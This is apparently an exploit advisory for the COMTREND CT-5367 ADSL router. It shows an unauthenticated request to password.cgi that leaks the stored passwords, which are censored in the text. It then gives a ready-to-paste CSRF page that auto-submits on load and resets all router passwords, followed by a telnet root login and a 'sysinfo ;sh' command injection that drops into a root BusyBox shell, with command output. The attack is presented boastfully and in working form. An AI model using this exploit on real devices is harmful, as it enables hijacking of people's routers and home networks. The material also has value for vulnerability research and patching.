COMTREND ADSL Router CT-5367 remote root exploit

1. /*COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12  Remote Root
2. =============================================================================
3. Board ID    : 96338A-122
4. Software    : A111-312BTC-C01_R12
5. Bootloader  : 1.0.37-12.1-1
6. Wireless Driver : 4.170.16.0.cpe2.1sd
7. ADSL        : A2pB023k.d20k_rc2
8.  
9. =============================================================================
10. Type        : HardWare
11. Risk of use : High
12. Type to use : Remote
13. Discovered by   : Todor Donev
14. Author Email    : todor.donev@gmail.com
15.  
16. =============================================================================
17. Special greetz to my sweetheart friend and my lil' secret Tsvetelina Emirska,
18. and all my other friends that support me a lot of times for everything !!
19.  
20. */
21.  
22. root@linux:~#  get.pl http://192.168.1.1/
23.  
24. /*HTTP/1.1 401 Unauthorized
25. Cache-Control: no-cache
26. Connection: close
27. Date: Sat, 01 Jan 2000 00:04:31 GMT
28. Server: micro_httpd                        ## Yeah !! Bite me :(
29. WWW-Authenticate: Basic realm="DSL Router"
30. Content-Type: text/html
31.  
32. <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
33. <BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
34. Authorization required.
35. <HR>
36. <ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS>
37. </BODY></HTML>
38. */
39.  
40. root@linux:~#  get.pl http://192.168.1.1/password.cgi   ## Information Disclosure
41.  
42. /*HTTP/1.1 200 Ok
43. Cache-Control: no-cache
44. Connection: close
45. Date: Mon, 03 Jan 2000 23:01:25 GMT
46. Server: micro_httpd
47. Content-Type: text/html
48.  
49. <html>
50.    <head>
51.       <meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
52.       <link rel="stylesheet" href='stylemain.css' type='text/css'>
53.          <link rel="stylesheet" href='colors.css' type='text/css'>
54.             <script language="javascript" src="util.js"></script>
55.             <script language="javascript">
56. <!-- hide -->\n                           ## Dammit! =))
57. pwdAdmin = '<CENSORED>';                  ## Censored Password
58. pwdSupport = '<CENSORED>';                ## Censored Password
59. pwdUser = '<CENSORED>';\n                 ## Censored Password
60. */
61.  
62.  
63.  
64. [CUT EXPLOIT HERE]                        ## CSRF For Change All passwords
65.  
66. <html>
67. <head></head>
68. <title>COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Change All passwords</title>
69. <body onLoad=javascript:document.form.submit()>
70. <form action="http://192.168.1.1/password.cgi"; method="POST" name="form">
71. <input type="hidden" name="sptPassword" value="shpek">
72. <input type="hidden" name="usrPassword" value="shpek">
73. <input type="hidden" name="sysPassword" value="shpek">
74. </form>
75. </body>
76. </html>
77.  
78. [CUT EXPLOIT HERE]
79.  
80.  
81. root@linux:~# telnet 192.168.1.1
82.  
83. ADSL Router Model CT-5367 Sw.Ver. C01_R12
84. Login: root
85. Password:
86. ## BINGOO !! Godlike =))
87. > ?
88.  
89. ?
90. help
91. logout
92. reboot
93. adsl
94. atm
95. ddns
96. dumpcfg
97. ping
98. siproxd
99. sntp
100. sysinfo
101. tftp
102. wlan
103. version
104. build
105. ipfilter
106.  
107. > sysinfo
108. Number of processes: 30
109.  11:46pm  up 2 days, 23:46,
110. load average: 1 min:0.12, 5 min:0.05, 15 min:0.09
111.               total         used         free       shared      buffers
112.   Mem:        14012        13028          984            0          588
113.  Swap:            0            0            0
114. Total:        14012        13028          984
115.  
116. > sysinfo ;sh                               ## JAILBREAK !! FirmWare sucks  :)
117. Number of processes: 30
118.  11:47pm  up 2 days, 23:47,
119. load average: 1 min:0.07, 5 min:0.05, 15 min:0.08
120.               total         used         free       shared      buffers
121.   Mem:        14012        13024          988            0          588
122.  Swap:            0            0            0
123. Total:        14012        13024          988
124.  
125.  
126. BusyBox v1.00 (2009.12.08-09:42+0000) Built-in shell (msh)
127. Enter 'help' for a list of built-in commands.
128.  
129. # cat /proc/version
130. Linux version 2.6.8.1 (wander@localhost.localdomain) (gcc version 3.4.2) #1 Tue Dec 8 17:40:39 CST 2009
131.  
132. # ps
133.   PID  Uid     VmSize Stat Command
134.     1 root        280 S   init
135.     2 root            SWN [ksoftirqd/0]
136.     3 root            SW< [events/0]
137.    4 root            SW< [khelper]
138.    5 root            SW< [kblockd/0]
139.   15 root            SW  [pdflush]
140.   16 root            SW  [pdflush]
141.   17 root            SW  [kswapd0]
142.   18 root            SW< [aio/0]
143.   23 root            SW  [mtdblockd]
144.   32 root        328 S   -sh
145.   65 root       1384 S   cfm
146.   72 root            SW  [bcmsw]
147.  192 root        216 S   pvc2684d
148.  275 root        496 S   nas -P /var/wl0nas.lan0.pid -H 34954 -l br0 -i wl0 -A
149.  342 root        304 S   dhcpd
150.  596 root       1384 S   CT_Polling
151.  600 root        432 S   pppd -c 0.0.35.1 -i nas_0_0_35 -u <CENSORED> -p
152.   931 root        248 S   dhcpc -i nas_0_0_40
153.   993 root        316 S   dproxy -D btc-adsl
154.   997 root        352 S   upnp -L br0 -W ppp_0_0_35_1 -D
155.  1013 root        512 S   siproxd --config /var/siproxd/siproxd.conf
156.  1014 root        512 S   siproxd --config /var/siproxd/siproxd.conf
157.  1015 root        512 S   siproxd --config /var/siproxd/siproxd.conf
158. 10745 root        292 S   syslogd -C -l 7
159. 10747 root        256 S   klogd
160.  6616 root       1396 S   telnetd
161.  6618 root       1428 S   telnetd
162.  6673 root        284 S   sh -c sysinfo ;sh
163.  6724 root        284 R   ps
164.  
165. # top
166. Mem: 13164K used, 848K free, 0K shrd, 588K buff, 5920K cached
167. Load average: 0.00, 0.02, 0.07    (State: S=sleeping R=running, W=waiting)
168.  
169.   PID USER     STATUS   RSS  PPID %CPU %MEM COMMAND
170.  6751 root     R        288  6675  0.7  2.0 exe
171.     2 root     SWN        0     1  0.3  0.0 ksoftirqd/0
172.  6616 root     S       1396    65  0.1  9.9 telnetd
173.   931 root     S        248     1  0.1  1.7 dhcpc
174.  6618 root     S       1428  6616  0.0 10.1 telnetd
175.    65 root     S       1384    32  0.0  9.8 cfm
176.   596 root     S       1384    65  0.0  9.8 CT_Polling
177.  1013 root     S        512     1  0.0  3.6 siproxd
178.  1014 root     S        512  1013  0.0  3.6 siproxd
179.  1015 root     S        512  1014  0.0  3.6 siproxd
180.   275 root     S        496     1  0.0  3.5 nas
181.   600 root     S        432     1  0.0  3.0 pppd
182.   997 root     S        352     1  0.0  2.5 upnp
183.    32 root     S        328     1  0.0  2.3 sh
184.   993 root     S        316     1  0.0  2.2 dproxy
185.  6675 root     S        316  6673  0.0  2.2 exe
186.   342 root     S        304     1  0.0  2.1 dhcpd
187. 10745 root     S        292     1  0.0  2.0 exe
188.  6673 root     S        284  6618  0.0  2.0 sh
189.     1 root     S        280     0  0.0  1.9 init
190. # echo *                                               ## ls o.O?!?                                        
191. bin dev etc lib linuxrc mnt proc sbin usr var webs
192. #